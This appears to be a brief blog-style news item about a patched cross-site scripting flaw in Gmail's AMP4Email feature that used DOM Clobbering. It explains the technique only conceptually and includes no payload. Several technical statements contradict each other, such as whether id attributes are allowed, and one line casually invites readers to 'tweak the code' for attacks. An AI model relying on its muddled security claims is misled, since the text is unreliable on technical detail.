Gmail is one of the most popular email services. Its free version provides one of the best free email services you can find. Google also offers many unique and useful features you can find on other email services. One of them is the dynamic email feature. It’s also known as AMP4Email.
AMP4Email can be considered the newest feature from Google for its Gmail service. This feature allows you to add dynamic HTML content in your email. With this capability, you can do many things. For example, the message you send will activate a command that the recipient can use. So, if you use this feature to create a message to spread a specific event, like a questionnaire, or let the recipient access a catalog, you can do it beautifully with its dynamic feature.
However, the Google Vulnerability Reward Program found something worrying about this new feature. They expose the serious problem and bug that occur in this feature back in August this year. This feature is prone to a hacking attack that utilizes the dynamic ability and its ability to include HTML content in the email. The hacker and phisher can easily use the XSS or cross-site scripting method to inject a link that will start the attack through the AMP4Email feature.
This feature doesn’t allow adding id attribute in the tags. This is another problem you must face. People can use this user-controlled id attribute to create HTML elements that they can use for the DOM Clobbering attack.
The other methods you can use are the global window object property. You can use this part to create the access that you want. The attacker uses the “window.username” command line to create similar effect like when you use “document.getElementById(‘username’)”. In short, AMP4Email provides a much easier method to create the elements that the attacker can use to inject the code in the email.
With that easier method to inject the code, this feature can become many problems in the future. And, it increases the risk of DOM Clobbering. DOM Clobbering itself is a legacy feature you can find on many web browsers. Moreover, this is also the source of many problems that can happen on many applications you use to access that web browser or integrated with it.
It doesn’t seem dangerous when you see it at glance. The problem also can be solved by repairing the HTML elements in it. However, this condition also is proved that the script code in the email can be activated through the AMP4Email feature. So, if you want, you can tweak the code and attributes for this kind of email. With this wide-opened path to enter others’ systems, the attacker can easily inject malicious code that can damage and cause a bigger problem.
Regarding this problem, Google has finally released the patch to repair the problem caused by their new feature. This new patch will solve the DOM Clobbering problem and risk of the injection of unwanted script code using the AMP4Email feature